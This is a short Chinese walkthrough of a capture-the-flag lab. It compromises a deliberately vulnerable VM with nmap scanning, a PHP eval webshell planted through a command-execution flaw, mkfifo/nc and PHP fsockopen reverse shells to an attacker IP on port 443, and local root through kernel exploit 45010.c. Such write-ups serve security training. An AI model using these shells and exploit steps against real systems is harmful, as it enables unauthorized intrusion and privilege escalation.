首先是下载镜像,然后用vmware打开,记得关闭usb,然后网络配置建议设置成桥接模式,然后需要指定桥接的网卡。

这样对于这个镜像还不够,需要改网卡配置。详情看另外一个视频

使用nmap进行扫描

sudo nmap -sP 192.168.[num1].1/24  

/24表示那个网段1-254都扫描

然后对靶机的ip进行端口扫描

sudo nmap -sC -sV -p- 192.168.[num1].[num2]

-sC 表示使用nmap脚本探测 -sV探测服务信息

-p-表示扫描全端口

扫出来开放了21和80端口

访问80端口可以看到一个网页

可以看到有一个任意命令执行漏洞

echo '<?php eval($_POST["hacker"]);' > hacker.php

蚁剑连接一下

检查文件目录

/var/www/html/site/wordpress

除此之外发现在/var/www/html下有一个./backup文件

然后21端口,用浏览器访问一遍,然后再连接一遍

发现能访问的目录是一样的,也就没啥用

现在就要反弹shell

这个靶机是对端口有限制的,只能用443端口。怎么判断出来的呢,两个办法。一个是因为他有网站相关服务,80端口443端口对应http和https,所以一般不会做限制。第二个办法就是利用脚本,每个端口都试一遍。而攻击机只需要把所有端口的流量都转到一个端口

sudo iptables -A PREROUTING -t nat -p tcp --dport 1:65535 -j REDIRECT --to-port 1234
nc -lvvp 1234

通过测试,发现只有443端口能用,则执行

<?php system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.1.[num] 443 >/tmp/f');?>

kali

nc -lvvp 443

Mac 得使用下面这个

nc -l 443

用这个升级一下bash功能

python3 -c 'import pty;pty.spawn("/bin/bash")'

看一下系统版本

uname -a
cat /proc/version
searchsploit linux kernel 4.4

searchsploit ubuntu16.04

找到这个45010.c文件,传到靶机,然后

gcc 45010.c

chmod +x a.out

./a.out

whomi

cat /root/proof.txt

443

ss

netstat -aptn

php -r '$sock=fsockopen("192.168.2.199",3306);exec("/bin/bash -i <&3 >&3 2>&3");'